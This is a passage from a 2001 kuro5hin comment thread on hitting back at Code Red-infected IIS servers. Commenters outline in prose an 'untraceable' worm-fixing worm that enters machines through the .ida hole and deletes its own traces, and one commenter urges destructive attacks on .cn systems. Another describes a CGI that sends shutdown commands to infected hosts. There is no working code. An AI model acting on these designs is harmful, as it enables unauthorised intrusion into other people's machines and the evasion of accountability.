by IOrdy on Fri Aug 10, 2001 at 11:09:08 AM EST

I would but... I'm busy as a bee hacking apt-get source so I can 'apt-get porn' from my local mirror :)

My wrist got sore so I stopped for a bit... hacking that is, damn you k5 people are crude.


www.iordy.com

Lesbian: porn-get into it (none / 0) (#137)
by kataklyst on Fri Aug 10, 2001 at 01:15:36 PM EST

There is already a project frighteningly similar to your idea.

And yes, it actually works.

[ Parent ]

fixmyiis.com (5.00 / 1) (#135)
by shumacher on Fri Aug 10, 2001 at 12:35:29 PM EST

What if you created a website where people could connect, and have your anti code-red script launched? Offer to launch the script from any of the following actions:

  • Clicking a button at the website.
  • Sending an email.

    Configure it so the emails and web page clicks request a script called default.ida, which gets the requesting ip, and launches your anti-worm.

    Sure, it's not much different from an ethical standpoint, but if someone requests that you repair their damage, why not oblige? If their system is so poorly configured that they can't prevent it from making spurious requests for your services, how is that your fault?

    When you can balance a tack hammer on your head, you can head off your foes with a balanced attack.

  • Nice idea, but... (none / 0) (#151)
    by adamwood on Sun Aug 12, 2001 at 06:51:22 PM EST

    ...the problem is that once a system has been totally compromised, then simply fixing the .ida exploit won't make the server safe (and a 100% accurate "is there a backdoor" scanner isn't exactly possible)

    [ Parent ]
    No problem (none / 0) (#156)
    by mrogers on Thu Aug 16, 2001 at 01:06:56 PM EST

    No problem - the web page could inform you if you've been infected using a popup window rather than disinfecting you.

    [ Parent ]
    Untraceable worm-fixing-worm (5.00 / 1) (#139)
    by sab39 on Fri Aug 10, 2001 at 02:28:48 PM EST

    Here's how to write one that's pretty untraceable. I don't have the first clue as to how to do this, but I wouldn't be sad if someone did.

    Step 1: Write code that uses the original code red hole to get in, kills running code-red processes, installs a piece of code, and then sets up that piece of code as the handler for *.ida by IIS. This piece of code should then look at the request and determine whether or not it is an attack. If it is, insert the same code into the attacking machine. If it isn't, pass it through to the original .ida handler with the argument truncated to a safe length. The code should also maintain a counter and only disinfect a fixed number of machines (say 20) before shutting down and going permanently into passive mode (truncate the argument and then pass it to the original handler). By doing this, you're almost guaranteed to not actually be doing any harm (the only thing you change is the ida handler, and you still pass through legitimate requests to that handler). This code should be thoroughly tested on all variants of machine that are vulnerable to code red.
    Step 2: Write a variant of the main loop for this script which does the following:
    a) Maintains a counter of the "depth" it's at.
    b) Installs itself as the .ida handler.
    c) Installs itself on a maximum of three other machines, with the "depth" incremented. Prefers machines far away in IP-space, but is random to some extent.
    d) After it has installed on three other machines, deletes itself as untraceably as possible (removes itself from handling .ida, then removes its own code).
    e) If the depth is >8, installs the script from step 1 instead (most of the code would be common; the modified main loop would never be transmitted past depth 8).
    f) Deletes itself regardless of having infected any other machines if a certain time passes.
    g) Doesn't shut down code red or do anything else that would advertise its presence.

    This will essentially "seed" the "Code Blue" worm at 3^8 random points 8 jumps away from the original starting point. By the time it starts shutting down code red (and therefore being noticed) all the original vector machines will have the seeding virus well and truly wiped. The only indication of it ever having been there will be hits in some webserver log file, indistinguishable from the zillions of other code red hits. Considering that code red itself can't be traced, this would be even more untraceable.

    I don't recommend being the person to write this. Even if I had the skills to do so, I probably wouldn't - I have too much to lose if I'm wrong and there is a way to trace it. But I hope that someone does something about code red, and something like this is really the only way - obviously the admins aren't going to. And when that person does, I hope that they do something untraceable like this, because I'd hate to see them suffer for it.
    --
    "Forty-two" -- Deep Thought
    "Quinze" -- Amélie

    Software (5.00 / 1) (#141)
    by tompjfan on Fri Aug 10, 2001 at 04:36:36 PM EST

    The obvious piece of software for the worm to install would be Apache of course.

    Code black (none / 0) (#146)
    by shokk on Sat Aug 11, 2001 at 01:06:32 PM EST

    How long do we sit back and watch this stuff come out of the .cn domain? How long until we start throwing these type of things into their domain and doing some serious damage. I want to start hitting back and seeing some downtime on their end. How about a competition to see how deep someone can make their way into the .cn and delete and disable? They get to have some progress while letting their crackers hamper our productivity - albeit because of security unconcious server companies and lazy admins? I don't think so. First fix the server, next fix the admins, then fix their wagons.
    "Beware of he who would deny you access to information, for in his heart, he dreams himself your master."
    ehm..... (none / 0) (#150)
    by tSB on Sun Aug 12, 2001 at 10:27:29 AM EST

    Removing Code Red is all well and good, but what about any backdoors that any script kiddies may have installed?

    Better to simply let the admin know what's going on.

    how do you stop IIS when it won't talk to you? (none / 0) (#152)
    by janra on Mon Aug 13, 2001 at 09:02:16 PM EST

    I've had a version of the perl cgi (posted here) running on my server for a while, and I added a couple of very simplistic tests to see if the shutdown command worked or not, and why. It didn't.

    Basically, I requested "/" before and after attempting to shut down IIS, to see if there was any difference and if the connection could be made at all. Every single infected server that has hit my default.ida script either tested as a '404' (/c/winnt/system32/cmd.exe not found) or as not having shut down, even though the script found cmd.exe

    After looking at the "/" page of a few of those computers myself, I almost invariably get the IIS "403.9" response (too many users are connected) which would explain why my commands aren't getting through. So how the heck do you get to an IIS server when it's replying with "403.9"?


    --
    Discuss the art and craft of writing
    That's the problem with world domination... Nobody is willing to wait for it anymore, work slowly towards it, drink more and enjoy the ride more.
    Code Red II retaliation Competition... | 156 comments (150 topical, 6 editorial, 0 hidden)
    Display: Sort:

    kuro5hin.org

    [XML]
    All trademarks and copyrights on this page are owned by their respective companies. The Rest © 2000 - Present Kuro5hin.org Inc.
    See our legalese page for copyright policies. Please also read our Privacy Policy.
    Kuro5hin.org is powered by Free Software, including Apache, Perl, and Linux, The Scoop Engine that runs this site is freely available, under the terms of the GPL.
    Need some help? Email help@kuro5hin.org.
    My heart's the long stairs.

    Powered by Scoop create account | help/FAQ | mission | links | search | IRC | YOU choose the stories!